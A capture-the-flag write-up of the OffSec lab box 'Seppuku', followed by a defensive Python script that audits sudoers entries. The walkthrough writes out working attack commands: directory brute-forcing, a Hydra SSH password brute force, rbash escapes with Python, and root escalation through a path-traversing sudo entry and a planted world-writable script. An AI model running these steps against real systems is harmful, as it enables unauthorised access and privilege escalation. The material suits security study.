Seppuku | OffSec Writeup
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH
Network scanning
We used Nmap for port scanning.
nmap -A -sC -sV <your IP>
The scan showed the following open ports: port 21 for FTP, port 22 for SSH, port 80 for HTTP, ports 139 and 445 for NetBIOS-SSN, port 7080 for SSL/HTTP, port 7601 for HTTP, and port 8088 for HTTP.
Then we visited http://192.168.217.90:8088
Then I ran gobuster and found many hidden directories. I checked all of them but did not find anything. Then I ran gobuster on port 7601 and found many important directories, such as secret key, keys, production.
gobuster dir -u https://IP:7601 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
When we browsed to the keys directory enumerated above, we found some files. The one named private was useful to us.
https://IP:7601/keys
This link leads to a file called private. It is a private key for some user that we have not identified yet.
Further, we will explore the 'secret' directory that we discovered during our Gobuster scan.
As a result, it gives some very important files such as password.lst and hostname.
Here we found a file named hostname, which gave us a username: seppuku.
I went into all the folders one by one and found a hostname.
open passwd.bk
After downloading passwd.bk and opening it, I found a password.lst file. I copied and saved it on my Linux system to further brute-force the password.
nano passwordlisst.txt
Exploiting
We have obtained the username 'seppuku'. Our next task is to find the password for the user 'seppuku' using Hydra for SSH login brute force.
hydra -l seppuku -P passwordlisst.txt 192.168.217.90 ssh
From its result, we found the password eeyoree for seppuku.
We have a username and password, so we tried to access the SSH on the target system and we were successfully able to log in.
ssh seppuku@192.168.217.90
ls
cat locat.txt
cd /home
I noticed that the cd command was not working, so I ran this command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
After that, the cd command worked:
cd /home
ls
I found that there are several users here, such as tanto, samurai and seppuku.
ls -la
After logging in, let's proceed with further investigation to find hidden files. We discovered a hidden file called .passwd, which provided us with a password, though its purpose is currently unknown.
Here I found a password.
I tried to log in as tanto over SSH, but I didn't succeed. Then I remembered that I had found a private file which contained an RSA key.
Again we hit the rbash restriction error, and again we bypassed the rbash shell with a Python command as before. To check for privilege escalation we ran the sudo -l command, and here we found a script entry that can be run without a password.
python -c 'import os; os.system("/bin/bash");'
sudo -l
I logged in over SSH as the samurai user.
Privilege Escalation
Now that we have read-write permissions in the user's home directory, we first create a .cgi_bin directory. Then, we move to the cgi directory and use the cat command to create a simple bash file, adding full permissions for everyone to read, write, and execute the file.
After logging in as tanto, we searched for the .cgi_bin directory, which would be executed through the sudo user. Unfortunately, we couldn't find this directory, so we created a directory named .cgi_bin and saved the bash script in a file named "bin" to obtain a bash shell through it.
mkdir .cgi_bin
cd .cgi_bin/
echo "/bin/bash" > bin
chmod 777 bin
ls -la
Now it was time to exploit the .cgi_bin program, so we logged in again as samurai, ran the following command, obtained the root shell, and finished the challenge by capturing the root flag.
sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
cd /root
ls
cat proof.txt
Root flag
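From the defender's side, the sudo entry abused above is dangerous because its path contains "..", its arguments are a wildcard, and it resolves to a file that did not exist inside a home directory another user can write to. The following is an added example, not part of the original writeup, that audits a sudoers line for those properties. The sample sudoers line is constructed from the sudo command shown above, and the function names and the purely lexical path resolution (symlinks are not followed component by component) are assumptions of this example.

```python
import os

# Constructed sudoers line modelled on the sudo command used in this writeup;
# the exact sudoers text is an assumption, not copied from the target.
SAMPLE = "samurai ALL=(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*"

def parse_nopasswd(line):
    """Return [(command_path, args)] for the NOPASSWD commands on one line."""
    if "NOPASSWD:" not in line:
        return []
    cmds = line.split("NOPASSWD:", 1)[1].split(",")
    return [tuple((c.strip().split(None, 1) + [""])[:2]) for c in cmds if c.strip()]

def audit_command(cmd, args, root="/", trusted_uids=(0,)):
    """Flag properties that let a non-root user control what sudo executes."""
    findings = []
    if ".." in cmd.split("/"):
        findings.append("dotdot-in-path")
    if any(ch in args for ch in "*?["):
        findings.append("wildcard-args")
    # Resolve ".." lexically, then re-base under `root` so the check can be
    # pointed at a test tree instead of the live filesystem.
    rel = os.path.normpath(cmd).lstrip("/")
    path = os.path.join(root, rel)
    if not os.path.exists(path):
        findings.append("target-missing")
    # Every existing component from the target up to `root` must be owned by
    # a trusted uid and not writable by group/other; otherwise someone else
    # can create or replace the file that sudo will run as root.
    stop = os.path.normpath(root)
    while os.path.normpath(path) != stop:
        if os.path.exists(path):
            st = os.stat(path)
            if st.st_uid not in trusted_uids or st.st_mode & 0o022:
                findings.append("replaceable:" + os.path.relpath(path, root))
        path = os.path.dirname(path)
    return findings

def audit_line(line, **kw):
    """Audit every NOPASSWD command on one sudoers line."""
    return {cmd: audit_command(cmd, args, **kw) for cmd, args in parse_nopasswd(line)}

if __name__ == "__main__":
    print(audit_line(SAMPLE))
```

Any finding on a NOPASSWD entry is a reason to rewrite it to a fixed, root-owned path with explicit arguments.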